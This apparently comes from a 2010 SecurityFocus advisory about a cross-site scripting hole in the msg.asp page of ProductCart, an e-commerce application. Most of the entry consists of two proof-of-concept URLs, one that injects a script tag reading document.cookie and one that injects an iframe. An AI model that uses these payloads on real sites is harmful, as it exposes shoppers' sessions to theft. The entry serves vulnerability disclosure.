ProductCart MSG.ASP Cross-Site Scripting Vulnerability

The following proof of concepts were provided:

http://www.website.com/ProductCart/pc/msg.asp?message=><script>alert
(document.cookie);</script>

http://www.website.com/ProductCart/pc/msg.asp?message=<iframe%20src="C:\"%
20width=400%20height=400></iframe>


 

Privacy Statement
Copyright 2010, SecurityFocus